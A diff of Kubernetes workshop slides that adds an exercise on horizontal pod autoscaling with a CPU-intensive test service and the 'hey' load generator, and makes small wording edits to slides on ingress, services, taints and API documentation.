|
||||
|
||||
- It computes how many pods should be running:
|
||||
|
||||
`TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
|
||||
|
||||
- It scales the related object up/down to this target number of pods
|
||||
|
||||
---
|
||||
|
||||
## Pre-requirements
|
||||
|
||||
- The metrics server needs to be running
|
||||
|
||||
(i.e. we need to be able to see pod metrics with `kubectl top pods`)
|
||||
|
||||
- The pods that we want to autoscale need to have resource requests
|
||||
|
||||
(because the target CPU% is not absolute, but relative to the request)
|
||||
|
||||
- The latter actually makes a lot of sense:
|
||||
|
||||
- if a Pod doesn't have a CPU request, it might be using 10% of CPU...
|
||||
|
||||
- ...but only because there is no CPU time available!
|
||||
|
||||
- this makes sure that we won't add pods to nodes that are already resource-starved
|
||||
|
||||
---
|
||||
|
||||
## Testing the HPA
|
||||
|
||||
- We will start a CPU-intensive web service
|
||||
|
||||
- We will send some traffic to that service
|
||||
|
||||
- We will create an HPA policy
|
||||
|
||||
- The HPA will automatically scale up the service for us
|
||||
|
||||
---
|
||||
|
||||
## A CPU-intensive web service
|
||||
|
||||
- Let's use `jpetazzo/busyhttp`
|
||||
|
||||
(it is a web server that will use 1s of CPU for each HTTP request)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy the web server:
|
||||
```bash
|
||||
kubectl create deployment busyhttp --image=jpetazzo/busyhttp
|
||||
```
|
||||
|
||||
- Expose it with a ClusterIP service:
|
||||
```bash
|
||||
kubectl expose deployment busyhttp --port=80
|
||||
```
|
||||
|
||||
- Port-forward to our service
|
||||
```bash
|
||||
kubectl port-forward service/busyhttp 8080:80 &
|
||||
curl -k localhost:8080
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Monitor what's going on
|
||||
|
||||
- Let's use some commands to watch what is happening
|
||||
|
||||
.exercise[
|
||||
|
||||
- Monitor pod CPU usage:
|
||||
```bash
|
||||
kubectl top pods
|
||||
```
|
||||
|
||||
- Monitor cluster events:
|
||||
```bash
|
||||
kubectl get events -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Send traffic to the service
|
||||
|
||||
- We will use [hey](https://github.com/rakyll/hey/releases) to send traffic
|
||||
|
||||
.exercise[
|
||||
|
||||
- Send a lot of requests to the service with a concurrency level of 3:
|
||||
```bash
|
||||
curl https://storage.googleapis.com/jblabs/dist/hey_linux_v0.1.2 > hey
|
||||
chmod +x hey
|
||||
./hey http://localhost:8080 -c 3 -n 200
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The CPU utilization should increase to 100%.
|
||||
|
||||
(The server is single-threaded and won't go above 100%.)
|
||||
|
||||
---
|
||||
|
||||
## Create an HPA policy
|
||||
|
||||
- There is a helper command to do that for us: `kubectl autoscale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the HPA policy for the `busyhttp` deployment:
|
||||
```bash
|
||||
kubectl autoscale deployment busyhttp --max=10
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
By default, it will assume a target of 80% CPU usage.
|
||||
|
||||
This can also be set with `--cpu-percent=`.
|
||||
|
||||
--
|
||||
|
||||
*The autoscaler doesn't seem to work. Why?*
|
||||
|
||||
---
|
||||
|
||||
## What did we miss?
|
||||
|
||||
- The events stream (`kubectl get events -w`) gives us a hint, but to be honest, it's not very clear:
|
||||
|
||||
`missing request for cpu`
|
||||
|
||||
- We forgot to specify a resource request for our Deployment!
|
||||
|
||||
- The HPA target is not an absolute CPU%
|
||||
|
||||
- It is relative to the CPU requested by the pod
|
||||
|
||||
---
|
||||
|
||||
## Adding a CPU request
|
||||
|
||||
- Let's edit the deployment and add a CPU request
|
||||
|
||||
- Since our server can use up to 1 core, let's request 1 core
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the Deployment definition:
|
||||
```bash
|
||||
kubectl edit deployment busyhttp
|
||||
```
|
||||
|
||||
- In the `containers` list, add the following block:
|
||||
```
|
||||
resources: {"requests":{"cpu":"1", "memory":"64Mi"}}
|
||||
```
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
- After saving and quitting, a rolling update happens
|
||||
|
||||
(if `hey` exits, make sure to restart it)
|
||||
|
||||
- It will take a minute or two for the HPA to kick in:
|
||||
|
||||
- the HPA runs every 30 seconds by default
|
||||
|
||||
- it needs to gather metrics from the metrics server first
|
||||
|
||||
- If we scale further up (or down), the HPA will react after a few minutes:
|
||||
|
||||
- it won't scale up if it already scaled in the last 3 minutes
|
||||
|
||||
- it won't scale down if it already scaled in the last 5 minutes
|
||||
|
||||
---
|
||||
|
||||
## What about other metrics?
|
||||
|
||||
- The HPA in API group `autoscaling/v1` only supports CPU scaling
|
||||
|
||||
- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
|
||||
|
||||
- metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
|
||||
|
||||
- custom.metrics.k8s.io, custom metrics per Pod
|
||||
|
||||
- external.metrics.k8s.io, external metrics (not associated to Pods)
|
||||
|
||||
- Kubernetes doesn't implement any of these API groups
|
||||
|
||||
- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
|
||||
|
||||
- The metrics provided by metrics server are standard; everything else is custom
|
||||
|
||||
- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
- the control loop watches over ingress resources, and configures the LB accordingly
|
||||
|
||||
- Step 2: set up DNS
|
||||
- Step 2: setup DNS
|
||||
|
||||
- associate DNS entries with the load balancer address
|
||||
|
||||
@@ -126,7 +126,7 @@
|
||||
|
||||
- We could use pods specifying `hostPort: 80`
|
||||
|
||||
... but with most CNI plugins, this [doesn't work or requires additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
|
||||
... but with most CNI plugins, this [doesn't work or require additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
|
||||
|
||||
- We could use a `NodePort` service
|
||||
|
||||
@@ -142,7 +142,7 @@
|
||||
|
||||
(sometimes called sandbox or network sandbox)
|
||||
|
||||
- An IP address is assigned to the pod
|
||||
- An IP address is associated to the pod
|
||||
|
||||
- This IP address is routed/connected to the cluster network
|
||||
|
||||
@@ -239,7 +239,7 @@ class: extra-details
|
||||
|
||||
- an error condition on the node
|
||||
<br/>
|
||||
(for instance: "disk full," do not start new pods here!)
|
||||
(for instance: "disk full", do not start new pods here!)
|
||||
|
||||
- The `effect` can be:
|
||||
|
||||
@@ -501,11 +501,11 @@ spec:
|
||||
|
||||
(as long as it has access to the cluster subnet)
|
||||
|
||||
- This allows the use of external (hardware, physical machines...) load balancers
|
||||
- This allows to use external (hardware, physical machines...) load balancers
|
||||
|
||||
- Annotations can encode special features
|
||||
|
||||
(rate-limiting, A/B testing, session stickiness, etc.)
|
||||
(rate-limiting, A/B testing, session stickiness, etc.)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -81,7 +81,7 @@ Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In another window, watch the pods (to see when they are created):
|
||||
- In another window, watch the pods (to see when they will be created):
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
```
|
||||
@@ -276,21 +276,3 @@ error: the server doesn't have a resource type "endpoint"
|
||||
- There is no `endpoint` object: `type Endpoints struct`
|
||||
|
||||
- The type doesn't represent a single endpoint, but a list of endpoints
|
||||
|
||||
---
|
||||
|
||||
## Exposing services to the outside world
|
||||
|
||||
- The default type (ClusterIP) only works for internal traffic
|
||||
|
||||
- If we want to accept external traffic, we can use one of these:
|
||||
|
||||
- NodePort (expose a service on a TCP port between 30000-32768)
|
||||
|
||||
- LoadBalancer (provision a cloud load balancer for our service)
|
||||
|
||||
- ExternalIP (use one node's external IP address)
|
||||
|
||||
- Ingress (a special mechanism for HTTP services)
|
||||
|
||||
*We'll see NodePorts and Ingresses more in detail later.*
|
||||
|
||||
@@ -108,7 +108,7 @@ class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
@@ -132,7 +132,7 @@ class: extra-details
|
||||
|
||||
- short (e.g. `no`, `svc`, `deploy`)
|
||||
|
||||
- Some resources do not have a short name
|
||||
- Some resources do not have a short names
|
||||
|
||||
- `Endpoints` only have a plural form
|
||||
|
||||
@@ -466,4 +466,4 @@ class: extra-details
|
||||
- For more details, see [KEP-0009] or the [node controller documentation]
|
||||
|
||||
[KEP-0009]: https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/0009-node-heartbeat.md
|
||||
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
|
||||
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
|
||||